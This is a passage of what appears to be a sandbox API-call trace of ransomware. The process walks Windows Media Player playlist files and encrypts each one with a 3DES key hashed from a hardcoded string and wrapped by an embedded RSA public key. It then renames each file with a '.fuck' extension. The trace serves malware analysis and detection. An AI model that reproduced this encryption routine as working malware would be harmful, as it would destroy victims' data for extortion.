lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.050] CryptEncrypt (in: hKey=0x2e7f280, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.050] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.063] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x94, lpOverlapped=0x0) returned 1 [0268.063] CryptEncrypt (in: hKey=0x2e7f280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x94, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0xa0) returned 1 [0268.063] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0xa0, lpOverlapped=0x0) returned 1 [0268.063] CloseHandle (hObject=0x5d4c) returned 1 [0268.063] CloseHandle (hObject=0x5d50) returned 1 [0268.063] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\01_music_auto_rated_at_5_stars.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\01_music_auto_rated_at_5_stars.wpl"), bFailIfExists=0) returned 1 [0268.067] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl", dwFileAttributes=0x0) returned 1 [0268.067] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\01_music_auto_rated_at_5_stars.wpl.gsg")) returned 1 [0268.068] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\01_music_auto_rated_at_5_stars.wpl.fuck")) returned 1 [0268.070] CryptDestroyHash (hHash=0x2e7f1c0) returned 1 [0268.070] CryptDestroyKey (hKey=0x2e7f280) returned 1 [0268.070] CryptReleaseContext (hProv=0x2f25818, dwFlags=0x0) returned 1 [0268.070] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.070] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.070] GetLastError () returned 0x0 [0268.070] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\02_music_added_in_the_last_month.wpl")) returned 0x20 [0268.071] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0268.071] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.072] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\02_music_added_in_the_last_month.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.073] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.074] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f25818) returned 1 [0268.077] CryptCreateHash (in: hProv=0x2f25818, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.077] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.077] CryptHashData (hHash=0x2e7f8c0, pbData=0x28cb738, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.077] CryptDeriveKey (in: hProv=0x2f25818, Algid=0x6610, hBaseData=0x2e7f8c0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7f1c0) returned 1 [0268.078] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.078] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.078] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f25460) returned 1 [0268.078] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25460, dwCertEncodingType=0x1, pInfo=0x2f313f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31420*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31428*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7f280) returned 1 [0268.078] CryptEncrypt (in: hKey=0x2e7f280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.079] CryptEncrypt (in: hKey=0x2e7f280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f254e8*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f254e8*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.079] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f254e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f254e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.080] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.086] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.086] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.088] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x17f, lpOverlapped=0x0) returned 1 [0268.088] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x17f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x180) returned 1 [0268.088] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x180, lpOverlapped=0x0) returned 1 [0268.088] CloseHandle (hObject=0x5d50) returned 1 [0268.089] CloseHandle (hObject=0x5d4c) returned 1 [0268.089] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\02_music_added_in_the_last_month.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\02_music_added_in_the_last_month.wpl"), bFailIfExists=0) returned 1 [0268.093] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl", dwFileAttributes=0x0) returned 1 [0268.094] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\02_music_added_in_the_last_month.wpl.gsg")) returned 1 [0268.095] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\02_music_added_in_the_last_month.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\02_Music_added_in_the_last_month.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\02_music_added_in_the_last_month.wpl.fuck")) returned 1 [0268.097] CryptDestroyHash (hHash=0x2e7f8c0) returned 1 [0268.097] CryptDestroyKey (hKey=0x2e7f1c0) returned 1 [0268.097] CryptReleaseContext (hProv=0x2f25818, dwFlags=0x0) returned 1 [0268.097] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.097] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.097] GetLastError () returned 0x0 [0268.097] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\03_music_rated_at_4_or_5_stars.wpl")) returned 0x20 [0268.098] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0268.099] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.100] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\03_music_rated_at_4_or_5_stars.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.101] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.102] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f24b58) returned 1 [0268.104] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.104] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.104] CryptHashData (hHash=0x2e7f8c0, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.104] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7f8c0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7f4c0) returned 1 [0268.104] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.104] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.104] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f25818) returned 1 [0268.105] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25818, dwCertEncodingType=0x1, pInfo=0x2f30d70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30da0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30da8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7f1c0) returned 1 [0268.105] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.105] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f250a8*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f250a8*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.105] WriteFile (in: hFile=0x5d50, lpBuffer=0x2f250a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f250a8*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.107] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.110] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0268.110] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0268.127] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x173, lpOverlapped=0x0) returned 1 [0268.127] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x173, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x180) returned 1 [0268.127] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x180, lpOverlapped=0x0) returned 1 [0268.127] CloseHandle (hObject=0x5d4c) returned 1 [0268.127] CloseHandle (hObject=0x5d50) returned 1 [0268.127] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\03_music_rated_at_4_or_5_stars.wpl.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\03_music_rated_at_4_or_5_stars.wpl"), bFailIfExists=0) returned 1 [0268.131] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x0) returned 1 [0268.131] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\03_music_rated_at_4_or_5_stars.wpl.gsg")) returned 1 [0268.133] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\03_Music_rated_at_4_or_5_stars.wpl.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\03_music_rated_at_4_or_5_stars.wpl.fuck")) returned 1 [0268.134] CryptDestroyHash (hHash=0x2e7f8c0) returned 1 [0268.134] CryptDestroyKey (hKey=0x2e7f4c0) returned 1 [0268.134] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.134] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.135] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.135] GetLastError () returned 0x0 [0268.135] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\04_music_played_in_the_last_month.wpl")) returned 0x20 [0268.135] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0268.136] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.136] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\04_music_played_in_the_last_month.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.137] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\04_Music_played_in_the_last_month.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.138] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f249c0) returned 1 [0268.141] CryptCreateHash (in: hProv=0x2f249c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.141] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.141] CryptHashData (hHash=0x29386f8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.141] CryptDeriveKey (in: hProv=0x2f249c0, Algid=0x6610, hBaseData=0x29386f8, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x29388b8) returned 1 [0268.141] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.141] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.141] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f24938) returned 1 [0268.142] CryptImportPublicKeyInfo (in: hCryptProv=0x2f24938, dwCertEncodingType=0x1, pInfo=0x2f30210*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30240*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30248*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2938838) returned 1 [0268.142] CryptEncrypt (in: hKey=0x2938838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.142] CryptEncrypt (in: hKey=0x2938838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24cf0*, 